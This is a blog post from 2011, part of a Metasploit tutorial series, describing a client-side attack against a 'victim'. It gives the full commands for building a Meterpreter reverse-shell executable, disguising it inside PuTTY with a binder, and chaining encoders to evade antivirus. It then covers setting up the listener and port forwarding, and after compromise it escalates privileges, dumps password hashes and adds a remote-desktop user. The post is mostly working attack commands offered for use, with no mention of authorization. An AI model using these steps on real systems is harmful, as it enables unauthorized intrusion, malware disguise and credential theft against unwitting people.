In this tutorial i will show basic metasploit client side attack .. In our case i will send a payload bound to an executable file, to the victim . if the victim opens the file the payload will be executed and it will give us backconnection to our meterpeter .
Type cd /pentest/exploits/framework in your terminal.
This is to navigate to the metasploit's folder . Ok to generate a payload , type the command .
msfpayload windows/meterpreter/reverse_tcp LHOST=your-wan-ip LPORT=4444 x > /root/payload.exe
To get your wan ip address just go to http://www.cmyip.com/
The windows/meterpreter/reverse_tcp is the payload we gonna use ,which will give us a tcp meterpreter session on execution..
Now you can see an executable file in your root folder named "payload.exe" ... now we have to send this executable to the victim ...
in our case i'm using a FUD binder to bind the payload with another executable file(i'm using putty a ssh client) to spoof the victim and to evade anti virus...
You can use any FUD binder or cypter but make sure you dont corrupt the file...
or you can even use metasploit's inbuilt crypter known as "msfencode" ...if you wish to use that, then your command will be
msfpayload windows/meterpreter/reverse_tcp LHOST=your-wan-ip LPORT=4444 R | ruby msfencode -t exe -e x86/shikata_ga_nai > /root/payload.exe
but detected by AV's... well you can even use multiple encryption like this...
msfpayload windows/meterpreter/reverse_tcp LHOST=your-wan-ip LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 3 -t raw | msfencode -e x86/fnstenv_mov -c 5 -t raw | msfencode -e x86/call4_dword_xor -c 4 -t raw | msfencode -e x86/countdown -c 4 -t raw | msfencode -e x86/shikata_ga_nai -c 16 -t exe > /root/msfpayload.exe
still detected by few AV's , or you can try using different combinations ...to see the list of available encryptions type "msfencode -h".. if it doesn't work try Hex editing after encryption....
ok , before sending the file to the victime we need to setup a listener to receive the meterpreter session when victim executes the file ... for that open up the msfconsole ..since we were in metaploit folder just type
msfconsole
and then type
use exploit/multi/handler
for payload..type
set PAYLOAD windows/meterpreter/reverse_tcp
this time for LHOST use your LAN ip , type "ifconfig" in another terminal for the lan ip...
so command will be like ..
set LHOST 192.168.1.xxx
and LPORT
set LPORT 4444
ok done.. now type
exploit
thats it ,now our listener will listen for any incoming connections on port 4444 .
Dont forget to port forward the router on port "4444" to your "lan ip"
after port forwarding ,check your port using this website http://canyouseeme.org/
okay , now our victim has executed the putty.exe (program bound to my payload) with in seconds our listener will give us a meterpreter session... that's it we own the system now....
now a simple hack using meterpreter..we will create a user account and enable remote desktop in victim's system ....
type "help" to see all the list of commands and their descriptions ..
type these commands to get thed system....
use priv
getsystem
to check your privilege
getuid
to dump hashes type "hashdump"...just play around with all the commands ...
ok now we will enable the remote desktop on the victim's computer,for that
run getgui -u username -p password
now open up a new terminal and type the command..
rdesktop -u username -p password victim's-ip
if you wish to delete the user accounts after using the RDP ,
after you have done with it, type "exit" to exit the session...
ok for guys trying to test this within virtual box ...make sure you have a VPN installed (like hotspot shield) in the windows box...and remember for LHOST use your WAN ip for payload and lan ip for listener ... very important is that portforward your router to backtrack's LAN ip on port 4444...
..that's it,, a basic client side exploitation..
thanks for reading my tutorial !!!
Monday, October 31, 2011
Metaspolit Framework tutorial -part 4(Client Side attack)
5:41 AM
Anonymous
No comments
0 comments:
Post a Comment